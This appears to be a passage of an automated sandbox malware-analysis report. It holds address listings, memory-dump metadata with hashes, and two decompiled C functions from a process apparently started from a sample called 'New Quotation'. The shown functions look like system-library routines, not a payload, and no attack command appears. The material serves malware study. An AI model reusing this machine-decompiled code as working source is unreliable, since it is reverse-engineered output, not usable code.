                                                                                                                                                                                          0x1d7cb94f
                                                                                                                                                                                          0x1d7cb958
                                                                                                                                                                                          0x1d7cb964
                                                                                                                                                                                          0x1d7cb96a
                                                                                                                                                                                          0x1d82cde2
                                                                                                                                                                                          0x1d82cde2
                                                                                                                                                                                          0x1d82cde5
                                                                                                                                                                                          0x1d82cdec
                                                                                                                                                                                          0x1d82cdee
                                                                                                                                                                                          0x1d7cb991
                                                                                                                                                                                          0x1d7cb991
                                                                                                                                                                                          0x1d7cb993
                                                                                                                                                                                          0x1d7cb99c
                                                                                                                                                                                          0x1d7cb9a8
                                                                                                                                                                                          0x1d7cb9a8
                                                                                                                                                                                          0x1d82cdf7
                                                                                                                                                                                          0x1d82cdfe
                                                                                                                                                                                          0x1d82ce00
                                                                                                                                                                                          0x1d82ce02
                                                                                                                                                                                          0x1d82ce02
                                                                                                                                                                                          0x1d82ce04
                                                                                                                                                                                          0x1d82ce04
                                                                                                                                                                                          0x1d82ce0a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82ce15
                                                                                                                                                                                          0x1d82ce1a
                                                                                                                                                                                          0x1d82ce1d
                                                                                                                                                                                          0x1d82ce1f
                                                                                                                                                                                          0x1d82ce22
                                                                                                                                                                                          0x1d82ce22
                                                                                                                                                                                          0x1d82ce22
                                                                                                                                                                                          0x1d82ce26
                                                                                                                                                                                          0x1d82ce2c
                                                                                                                                                                                          0x1d82ce2e
                                                                                                                                                                                          0x1d82ce31
                                                                                                                                                                                          0x1d82ce31
                                                                                                                                                                                          0x1d82ce33
                                                                                                                                                                                          0x1d82ce34
                                                                                                                                                                                          0x1d82ce34
                                                                                                                                                                                          0x1d82ce38
                                                                                                                                                                                          0x1d82ce3a
                                                                                                                                                                                          0x1d82ce3a
                                                                                                                                                                                          0x1d82ce3d
                                                                                                                                                                                          0x1d82ce3f
                                                                                                                                                                                          0x1d82ce41
                                                                                                                                                                                          0x1d82ce41
                                                                                                                                                                                          0x1d82ce46
                                                                                                                                                                                          0x1d82ce4b
                                                                                                                                                                                          0x1d82ce4e
                                                                                                                                                                                          0x1d82ce51
                                                                                                                                                                                          0x1d82ce56
                                                                                                                                                                                          0x1d82ce56
                                                                                                                                                                                          0x1d82ce58
                                                                                                                                                                                          0x1d82ce5b
                                                                                                                                                                                          0x1d82ce64
                                                                                                                                                                                          0x1d82ce64
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82ce5d
                                                                                                                                                                                          0x1d82ce5d
                                                                                                                                                                                          0x1d82ce62
                                                                                                                                                                                          0x1d82ce69
                                                                                                                                                                                          0x1d82ce69
                                                                                                                                                                                          0x1d82ce6f
                                                                                                                                                                                          0x1d82ce71
                                                                                                                                                                                          0x1d82cec0
                                                                                                                                                                                          0x1d82cec2
                                                                                                                                                                                          0x1d82cec4
                                                                                                                                                                                          0x1d82cec4
                                                                                                                                                                                          0x1d82cec7
                                                                                                                                                                                          0x1d82cec7
                                                                                                                                                                                          0x1d82cecd
                                                                                                                                                                                          0x1d82ced4
                                                                                                                                                                                          0x1d82ced6
                                                                                                                                                                                          0x1d82cf31
                                                                                                                                                                                          0x1d82cf31
                                                                                                                                                                                          0x1d82cf33
                                                                                                                                                                                          0x1d82cf33
                                                                                                                                                                                          0x1d82cf36
                                                                                                                                                                                          0x1d82cf36
                                                                                                                                                                                          0x1d82cf38
                                                                                                                                                                                          0x1d82cf39
                                                                                                                                                                                          0x1d82cf39
                                                                                                                                                                                          0x1d82cf3d
                                                                                                                                                                                          0x1d82cf3d
                                                                                                                                                                                          0x1d82cf3f
                                                                                                                                                                                          0x1d82cf3f
                                                                                                                                                                                          0x1d82cf45
                                                                                                                                                                                          0x1d82cf49
                                                                                                                                                                                          0x1d82cf9a
                                                                                                                                                                                          0x1d82cf9a
                                                                                                                                                                                          0x1d82cfa1
                                                                                                                                                                                          0x1d82cfa5
                                                                                                                                                                                          0x1d82cfac
                                                                                                                                                                                          0x1d82cfb4
                                                                                                                                                                                          0x1d82cfb7
                                                                                                                                                                                          0x1d82cfba
                                                                                                                                                                                          0x1d82cfc4
                                                                                                                                                                                          0x1d82cfc5
                                                                                                                                                                                          0x1d82cfd3
                                                                                                                                                                                          0x1d82cfe2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82cfe2
                                                                                                                                                                                          0x1d82cf52
                                                                                                                                                                                          0x1d82cf54
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82cf56
                                                                                                                                                                                          0x1d82cf59
                                                                                                                                                                                          0x1d82cf62
                                                                                                                                                                                          0x1d82cf63
                                                                                                                                                                                          0x1d82cf64
                                                                                                                                                                                          0x1d82cf6b
                                                                                                                                                                                          0x1d82cf6d
                                                                                                                                                                                          0x1d82cf71
                                                                                                                                                                                          0x1d82cf73
                                                                                                                                                                                          0x1d82cf79
                                                                                                                                                                                          0x1d82cf7d
                                                                                                                                                                                          0x1d82cf82
                                                                                                                                                                                          0x1d82cf82
                                                                                                                                                                                          0x1d82cf82
                                                                                                                                                                                          0x1d82cf79
                                                                                                                                                                                          0x1d82cf8c
                                                                                                                                                                                          0x1d82cf93
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82cf93
                                                                                                                                                                                          0x1d82ced8
                                                                                                                                                                                          0x1d82cede
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82cede
                                                                                                                                                                                          0x1d82ce75
                                                                                                                                                                                          0x1d82ce7c
                                                                                                                                                                                          0x1d82ce8d
                                                                                                                                                                                          0x1d82ce92
                                                                                                                                                                                          0x1d82ce95
                                                                                                                                                                                          0x1d82ce97
                                                                                                                                                                                          0x1d82ce9a
                                                                                                                                                                                          0x1d82ce9c
                                                                                                                                                                                          0x1d82cea6
                                                                                                                                                                                          0x1d82cea6
                                                                                                                                                                                          0x1d82ceab
                                                                                                                                                                                          0x1d82ceb1
                                                                                                                                                                                          0x1d82ceb4
                                                                                                                                                                                          0x1d82ceb8
                                                                                                                                                                                          0x1d82ceb8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82ceb8
                                                                                                                                                                                          0x1d82ce9e
                                                                                                                                                                                          0x1d82cea0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82cea2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82cea4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82ce62
                                                                                                                                                                                          0x1d82ce5b
                                                                                                                                                                                          0x1d82cee4
                                                                                                                                                                                          0x1d82cee6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82cee8
                                                                                                                                                                                          0x1d82ceee
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82cef0
                                                                                                                                                                                          0x1d82cef7
                                                                                                                                                                                          0x1d82cef7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82cef7
                                                                                                                                                                                          0x1d7cb97a
                                                                                                                                                                                          0x1d82cdd9
                                                                                                                                                                                          0x1d82cddc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82cddc
                                                                                                                                                                                          0x1d7cb980
                                                                                                                                                                                          0x1d7cb980
                                                                                                                                                                                          0x1d7cb983
                                                                                                                                                                                          0x1d7cb98b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 4a54192d32f1a9904eb97c1f74d1556d121b7b3a9b2ce809a8f91869769f7a14
                                                                                                                                                                                          • Instruction ID: b0b54712aa56c73f4c0b64a99777b61b6513de858b4753da179cda21203866c3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a54192d32f1a9904eb97c1f74d1556d121b7b3a9b2ce809a8f91869769f7a14
                                                                                                                                                                                          • Instruction Fuzzy Hash: EE61E375D042598EDB21CFB8C880BBDBBB0FF04720F5141ADE8499B281D77559C5CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7FECF3 Relevance: .2, Instructions: 166COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 81%
                                                                                                                                                                                          			E1D7FECF3(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t50;
				intOrPtr _t53;
				intOrPtr _t62;
				intOrPtr _t69;
				void* _t72;
				intOrPtr* _t76;
				signed int _t89;
				void* _t91;
				intOrPtr* _t94;
				intOrPtr* _t99;
				intOrPtr _t104;
				intOrPtr* _t105;
				signed int _t109;
				void* _t114;
				void* _t123;

				_push(__ecx);
				_push(__ecx);
				_t50 =  *0x1d8c664c; // 0x18ef560
				_v12 = __edx;
				_t89 = 0;
				_t109 = __ecx;
				_v8 = _v8 & 0;
				L1D7D53C0(_t50 + 4);
				_t104 =  *0x1d8c664c; // 0x18ef560
				_t105 = _t104 + 8;
				_t94 =  *_t105;
				while(_t94 != _t105) {
					_t114 = _t94 - 0x1c;
					_t62 =  *((intOrPtr*)(_t109 + 0xc));
					if( *((intOrPtr*)(_t114 + 0x10)) !=  *((intOrPtr*)(_t109 + 8)) ||  *((intOrPtr*)(_t114 + 0x14)) != _t62 ||  *((intOrPtr*)(_t114 + 8)) !=  *_t109) {
						L20:
						_t94 =  *_t94;
						continue;
					} else {
						_t64 =  *((intOrPtr*)(_t114 + 0xc));
						if( *((intOrPtr*)(_t114 + 0xc)) !=  *((intOrPtr*)(_t109 + 4))) {
							goto L20;
						}
						_t12 = _t114 + 0x28; // 0x28
						_t91 = _t12;
						L1D7E2330(_t64, _t91);
						if( *(_t114 + 0x5c) == 2) {
							__eflags = _v12;
							if(_v12 == 0) {
								E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *(_t114 + 0x58));
								 *(_t114 + 0x58) =  *(_t114 + 0x58) & 0x00000000;
								 *(_t114 + 0x5c) =  *(_t114 + 0x5c) & 0x00000000;
								L8:
								asm("lock inc dword [esi+0x50]");
								 *(_t114 + 0x5c) = 1;
								E1D7E24D0(_t91);
								_t69 =  *0x1d8c664c; // 0x18ef560
								_t123 = _t69 + 4;
								E1D7D52F0(_t94, _t69 + 4);
								while(1) {
									_t92 = 0;
									_t72 = E1D7FEE48(0, _t109, _t114, _t109, _t114, _t123, 0);
									_t124 = _t72 - 0xc000022d;
									if(_t72 == 0xc000022d) {
										_t92 = 0xc000022d;
									}
									if(E1D7FEE48(_t92, _t109, _t114, _t109, _t114, _t124, 1) == 0xc000022d) {
										_t89 = 0xc000022d;
									}
									_t16 = _t114 + 0x28; // 0x28
									L1D7E2330(_t16, _t16);
									_v8 = _v8 + 1;
									_t19 = _t114 + 0x2c; // 0x2c
									_t99 = _t19;
									_t76 =  *_t99;
									while(_t76 != _t99) {
										 *(_t76 + 0x60) =  *(_t76 + 0x60) & 0x00000000;
										_t76 =  *_t76;
									}
									if( *(_t114 + 0x58) != 0) {
										_t109 =  *(_t114 + 0x58);
										_t42 = _t114 + 0x28; // 0x28
										 *(_t114 + 0x58) =  *(_t114 + 0x58) & 0x00000000;
										E1D7E24D0(_t42);
										continue;
									}
									if(_t89 != 0) {
										__eflags = _t89 - 0xc000022d;
										if(_t89 == 0xc000022d) {
											 *(_t114 + 0x58) = _t109;
											 *(_t114 + 0x5c) = 2;
											E1D85C41F(_t114);
										}
										L17:
										_t26 = _t114 + 0x28; // 0x28
										E1D7E24D0(_t26);
										L1D7FEC45(_t114);
										L18:
										if(_v8 > 1) {
											_t47 = _t109 + 8; // 0xb
											_push(0);
											_push(0);
											_push(_t89);
											_push( *((intOrPtr*)(_t109 + 0x18)));
											_push(_t109);
											E1D8138C0();
											__eflags = _t89;
											if(_t89 == 0) {
												E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
											}
											_t89 = 0x80;
										}
										return _t89;
									}
									 *(_t114 + 0x5c) =  *(_t114 + 0x5c) & _t89;
									if( *((intOrPtr*)(_t114 + 0x18)) != _t89) {
										__eflags =  *((intOrPtr*)(_t109 + 0x10)) -  *((intOrPtr*)(_t114 + 0x18));
										if( *((intOrPtr*)(_t109 + 0x10)) -  *((intOrPtr*)(_t114 + 0x18)) > 0) {
											goto L16;
										}
										goto L17;
									}
									L16:
									 *((intOrPtr*)(_t114 + 0x18)) =  *((intOrPtr*)(_t109 + 0x10));
									goto L17;
								}
							}
							_push(_t91);
							L27:
							E1D7E24D0();
							_t89 = 0x80;
							break;
						}
						if( *(_t114 + 0x5c) == 1) {
							__eflags = _v12;
							_push(_t91);
							if(_v12 != 0) {
								goto L27;
							}
							 *(_t114 + 0x58) = _t109;
							E1D7E24D0();
							_t89 = 0x103;
							break;
						}
						goto L8;
					}
				}
				_t53 =  *0x1d8c664c; // 0x18ef560
				E1D7D52F0(_t94, _t53 + 4);
				goto L18;
			}
























                                                                                                                                                                                          0x1d7fecf8
                                                                                                                                                                                          0x1d7fecf9
                                                                                                                                                                                          0x1d7fecfa
                                                                                                                                                                                          0x1d7fed05
                                                                                                                                                                                          0x1d7fed08
                                                                                                                                                                                          0x1d7fed0a
                                                                                                                                                                                          0x1d7fed0c
                                                                                                                                                                                          0x1d7fed10
                                                                                                                                                                                          0x1d7fed15
                                                                                                                                                                                          0x1d7fed1b
                                                                                                                                                                                          0x1d7fed1e
                                                                                                                                                                                          0x1d7fed20
                                                                                                                                                                                          0x1d7fed2b
                                                                                                                                                                                          0x1d7fed31
                                                                                                                                                                                          0x1d7fed34
                                                                                                                                                                                          0x1d7fee1d
                                                                                                                                                                                          0x1d7fee1d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fed4e
                                                                                                                                                                                          0x1d7fed4e
                                                                                                                                                                                          0x1d7fed54
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fed5a
                                                                                                                                                                                          0x1d7fed5a
                                                                                                                                                                                          0x1d7fed5e
                                                                                                                                                                                          0x1d7fed67
                                                                                                                                                                                          0x1d83fc5b
                                                                                                                                                                                          0x1d83fc5f
                                                                                                                                                                                          0x1d83fc7f
                                                                                                                                                                                          0x1d83fc84
                                                                                                                                                                                          0x1d83fc88
                                                                                                                                                                                          0x1d7fed77
                                                                                                                                                                                          0x1d7fed77
                                                                                                                                                                                          0x1d7fed7c
                                                                                                                                                                                          0x1d7fed83
                                                                                                                                                                                          0x1d7fed88
                                                                                                                                                                                          0x1d7fed8d
                                                                                                                                                                                          0x1d7fed91
                                                                                                                                                                                          0x1d7fed96
                                                                                                                                                                                          0x1d7fed96
                                                                                                                                                                                          0x1d7fed9d
                                                                                                                                                                                          0x1d7feda7
                                                                                                                                                                                          0x1d7feda9
                                                                                                                                                                                          0x1d83fcaa
                                                                                                                                                                                          0x1d83fcaa
                                                                                                                                                                                          0x1d7fedc1
                                                                                                                                                                                          0x1d83fcb1
                                                                                                                                                                                          0x1d83fcb1
                                                                                                                                                                                          0x1d7fedc7
                                                                                                                                                                                          0x1d7fedcb
                                                                                                                                                                                          0x1d7fedd0
                                                                                                                                                                                          0x1d7fedd3
                                                                                                                                                                                          0x1d7fedd3
                                                                                                                                                                                          0x1d7fedd6
                                                                                                                                                                                          0x1d7fedd8
                                                                                                                                                                                          0x1d7fee24
                                                                                                                                                                                          0x1d7fee28
                                                                                                                                                                                          0x1d7fee28
                                                                                                                                                                                          0x1d7fede0
                                                                                                                                                                                          0x1d83fcb8
                                                                                                                                                                                          0x1d83fcbb
                                                                                                                                                                                          0x1d83fcbe
                                                                                                                                                                                          0x1d83fcc3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83fcc3
                                                                                                                                                                                          0x1d7fede8
                                                                                                                                                                                          0x1d83fcd2
                                                                                                                                                                                          0x1d83fcd4
                                                                                                                                                                                          0x1d83fcdc
                                                                                                                                                                                          0x1d83fcdf
                                                                                                                                                                                          0x1d83fce6
                                                                                                                                                                                          0x1d83fce6
                                                                                                                                                                                          0x1d7fedfc
                                                                                                                                                                                          0x1d7fedfc
                                                                                                                                                                                          0x1d7fee00
                                                                                                                                                                                          0x1d7fee07
                                                                                                                                                                                          0x1d7fee0c
                                                                                                                                                                                          0x1d7fee10
                                                                                                                                                                                          0x1d83fcf2
                                                                                                                                                                                          0x1d83fcf5
                                                                                                                                                                                          0x1d83fcf6
                                                                                                                                                                                          0x1d83fcf7
                                                                                                                                                                                          0x1d83fcf8
                                                                                                                                                                                          0x1d83fcfb
                                                                                                                                                                                          0x1d83fcfd
                                                                                                                                                                                          0x1d83fd02
                                                                                                                                                                                          0x1d83fd04
                                                                                                                                                                                          0x1d83fd11
                                                                                                                                                                                          0x1d83fd11
                                                                                                                                                                                          0x1d83fd16
                                                                                                                                                                                          0x1d83fd16
                                                                                                                                                                                          0x1d7fee1c
                                                                                                                                                                                          0x1d7fee1c
                                                                                                                                                                                          0x1d7fedee
                                                                                                                                                                                          0x1d7fedf4
                                                                                                                                                                                          0x1d7fee32
                                                                                                                                                                                          0x1d7fee34
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fee36
                                                                                                                                                                                          0x1d7fedf6
                                                                                                                                                                                          0x1d7fedf9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fedf9
                                                                                                                                                                                          0x1d7fed96
                                                                                                                                                                                          0x1d83fc61
                                                                                                                                                                                          0x1d83fc62
                                                                                                                                                                                          0x1d83fc62
                                                                                                                                                                                          0x1d83fc67
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83fc67
                                                                                                                                                                                          0x1d7fed71
                                                                                                                                                                                          0x1d83fc91
                                                                                                                                                                                          0x1d83fc95
                                                                                                                                                                                          0x1d83fc96
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83fc98
                                                                                                                                                                                          0x1d83fc9b
                                                                                                                                                                                          0x1d83fca0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83fca0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fed71
                                                                                                                                                                                          0x1d7fed34
                                                                                                                                                                                          0x1d7fee38
                                                                                                                                                                                          0x1d7fee41
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 1411184cde5744ea26fd307d2ef1d983b0a04c42ff487429941870aa0aa44015
                                                                                                                                                                                          • Instruction ID: 422cc572c6ba40c75b5e644754bcd427d90dfcd45caf7e501e559b969add23b1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1411184cde5744ea26fd307d2ef1d983b0a04c42ff487429941870aa0aa44015
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3251CF72604741EFD731CB59D484A6AB3A9FF05B2AF104D2EE55687A20C7B4F885CB82
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7FCD10 Relevance: .2, Instructions: 165COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 88%
                                                                                                                                                                                          			E1D7FCD10(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				signed int _v44;
				short _v46;
				char _v56;
				signed int _t69;
				intOrPtr* _t70;
				signed int _t71;
				signed int _t75;
				signed int _t91;
				signed int _t92;
				void* _t93;
				signed int _t95;
				signed int _t98;
				void* _t99;
				signed int _t104;
				char* _t106;
				signed int _t108;
				signed int _t109;
				char* _t112;
				intOrPtr _t115;
				intOrPtr _t119;
				char _t120;

				_t106 =  *((intOrPtr*)( *[fs:0x30] + 0x470));
				if(_t106 == 0 ||  *_t106 == 0) {
					return E1D7FCDE3(_a4, _a8, __eflags);
				} else {
					_v28 =  *((intOrPtr*)(_t106 + 4));
					asm("lock or [eax], ecx");
					_t69 = _a12;
					_t104 =  *( *[fs:0x30] + 0x474) & 0x00000001;
					_v12 = _t104;
					if(_t69 != 0) {
						_v16 =  *_t69;
						_v20 =  *((intOrPtr*)(_t69 + 4));
					} else {
						_v16 = _v16 & _t69;
						_v20 = _v20 & _t69;
					}
					_t70 = _a4;
					_t91 = 0x989680;
					_t119 =  *_t70;
					_t115 =  *((intOrPtr*)(_t70 + 4));
					_t71 = 0;
					_v24 = _v24 & 0;
					_v8 = 0;
					if(_v28 > 0) {
						_t108 = _t106 + 8;
						__eflags = _t108;
						_v12 = _t104;
						_v12 = _t108;
						do {
							_t92 =  *_t108;
							_t109 =  *(_t108 + 4);
							__eflags = _t109;
							if(__eflags < 0) {
								L30:
								_t93 = _t92 - _v16;
								asm("sbb edx, [ebp-0x10]");
								__eflags = _t115 - (_t109 & 0x7fffffff);
								if(__eflags < 0) {
									break;
								}
								if(__eflags > 0) {
									L33:
									_t71 = _t71 - 1;
									__eflags = _t71;
									L34:
									_v8 = _t71;
									goto L35;
								}
								__eflags = _t119 - _t93;
								if(__eflags < 0) {
									break;
								}
								goto L33;
							}
							if(__eflags > 0) {
								L17:
								_t99 = _t92 - _v16;
								asm("sbb edx, [ebp-0x10]");
								_v32 = _t99 + 0x1312d00;
								asm("adc eax, 0x0");
								__eflags = _t115 - _t109;
								if(__eflags < 0) {
									L21:
									_v32 = _t99 + 0x989680;
									asm("adc eax, 0x0");
									__eflags = _t115 - _t109;
									if(__eflags < 0) {
										L25:
										__eflags = _t115 - _t109;
										if(__eflags < 0) {
											break;
										}
										if(__eflags > 0) {
											L28:
											_t104 = _t104 | 0x00000004;
											__eflags = _t104;
											L29:
											_t71 = _v8;
											goto L35;
										}
										__eflags = _t119 - _t99;
										if(__eflags < 0) {
											break;
										}
										goto L28;
									}
									if(__eflags > 0) {
										L24:
										_t104 = _t104 | 0x00000002;
										goto L29;
									}
									__eflags = _t119 - _v32;
									if(_t119 < _v32) {
										goto L25;
									}
									goto L24;
								}
								if(__eflags > 0) {
									L20:
									_t71 = _v8 + 1;
									goto L34;
								}
								__eflags = _t119 - _v32;
								if(_t119 < _v32) {
									goto L21;
								}
								goto L20;
							}
							__eflags = _t92;
							if(_t92 < 0) {
								goto L30;
							}
							goto L17;
							L35:
							_t98 = _v24 + 1;
							_t108 = _v12 + 8;
							_v24 = _t98;
							_v12 = _t108;
							__eflags = _t98 - _v28;
						} while (__eflags < 0);
						_t71 = _v8;
						_t91 = 0x989680;
						_v12 = _t104;
						goto L5;
					} else {
						L5:
						_t120 = _t119 - _t71 * _t91;
						_v40 = _t120;
						asm("sbb edi, edx");
						_v36 = _t115;
						_t95 = _t104 & 0x00000002;
						_t131 = _t95;
						if(_t95 != 0) {
							_v40 = _t120 - 0x989680;
							asm("sbb edi, 0x0");
							_v36 = _t115;
						}
						_t112 =  &_v56;
						E1D7FCDE3( &_v40, _t112, _t131);
						_t75 = _v12;
						if((_t75 & 0x00000001) != 0) {
							__eflags = _t95;
							if(_t95 != 0) {
								_v46 = _v46 + 1;
							}
						} else {
							if((_t75 & 0x00000004) != 0) {
								asm("cdq");
								_t75 = _v44 - _t112 >> 1;
								_v44 = _t75;
							} else {
								_t75 = _v44;
							}
							if(_t95 != 0) {
								asm("cdq");
								_t75 = (_t75 - _t112 >> 1) + 0x1f4;
								_v44 = _t75;
							}
						}
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						return _t75;
					}
				}
			}

































                                                                                                                                                                                          0x1d7fcd1e
                                                                                                                                                                                          0x1d7fcd26
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fcd35
                                                                                                                                                                                          0x1d7fcd3c
                                                                                                                                                                                          0x1d7fcd43
                                                                                                                                                                                          0x1d7fcd4d
                                                                                                                                                                                          0x1d7fcd56
                                                                                                                                                                                          0x1d7fcd59
                                                                                                                                                                                          0x1d7fcd5e
                                                                                                                                                                                          0x1d7fcdd8
                                                                                                                                                                                          0x1d7fcdde
                                                                                                                                                                                          0x1d7fcd60
                                                                                                                                                                                          0x1d7fcd60
                                                                                                                                                                                          0x1d7fcd63
                                                                                                                                                                                          0x1d7fcd63
                                                                                                                                                                                          0x1d7fcd66
                                                                                                                                                                                          0x1d7fcd69
                                                                                                                                                                                          0x1d7fcd6e
                                                                                                                                                                                          0x1d7fcd70
                                                                                                                                                                                          0x1d7fcd73
                                                                                                                                                                                          0x1d7fcd75
                                                                                                                                                                                          0x1d7fcd78
                                                                                                                                                                                          0x1d7fcd7e
                                                                                                                                                                                          0x1d83e9f6
                                                                                                                                                                                          0x1d83e9f6
                                                                                                                                                                                          0x1d83e9f9
                                                                                                                                                                                          0x1d83e9fc
                                                                                                                                                                                          0x1d83e9ff
                                                                                                                                                                                          0x1d83e9ff
                                                                                                                                                                                          0x1d83ea01
                                                                                                                                                                                          0x1d83ea04
                                                                                                                                                                                          0x1d83ea06
                                                                                                                                                                                          0x1d83ea65
                                                                                                                                                                                          0x1d83ea6b
                                                                                                                                                                                          0x1d83ea6e
                                                                                                                                                                                          0x1d83ea71
                                                                                                                                                                                          0x1d83ea73
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83ea75
                                                                                                                                                                                          0x1d83ea7b
                                                                                                                                                                                          0x1d83ea7b
                                                                                                                                                                                          0x1d83ea7b
                                                                                                                                                                                          0x1d83ea7c
                                                                                                                                                                                          0x1d83ea7c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83ea7c
                                                                                                                                                                                          0x1d83ea77
                                                                                                                                                                                          0x1d83ea79
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83ea79
                                                                                                                                                                                          0x1d83ea08
                                                                                                                                                                                          0x1d83ea0e
                                                                                                                                                                                          0x1d83ea0e
                                                                                                                                                                                          0x1d83ea13
                                                                                                                                                                                          0x1d83ea1b
                                                                                                                                                                                          0x1d83ea20
                                                                                                                                                                                          0x1d83ea23
                                                                                                                                                                                          0x1d83ea25
                                                                                                                                                                                          0x1d83ea34
                                                                                                                                                                                          0x1d83ea3b
                                                                                                                                                                                          0x1d83ea40
                                                                                                                                                                                          0x1d83ea43
                                                                                                                                                                                          0x1d83ea45
                                                                                                                                                                                          0x1d83ea53
                                                                                                                                                                                          0x1d83ea53
                                                                                                                                                                                          0x1d83ea55
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83ea57
                                                                                                                                                                                          0x1d83ea5d
                                                                                                                                                                                          0x1d83ea5d
                                                                                                                                                                                          0x1d83ea5d
                                                                                                                                                                                          0x1d83ea60
                                                                                                                                                                                          0x1d83ea60
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83ea60
                                                                                                                                                                                          0x1d83ea59
                                                                                                                                                                                          0x1d83ea5b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83ea5b
                                                                                                                                                                                          0x1d83ea47
                                                                                                                                                                                          0x1d83ea4e
                                                                                                                                                                                          0x1d83ea4e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83ea4e
                                                                                                                                                                                          0x1d83ea49
                                                                                                                                                                                          0x1d83ea4c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83ea4c
                                                                                                                                                                                          0x1d83ea27
                                                                                                                                                                                          0x1d83ea2e
                                                                                                                                                                                          0x1d83ea31
                                                                                                                                                                                          0x00000000
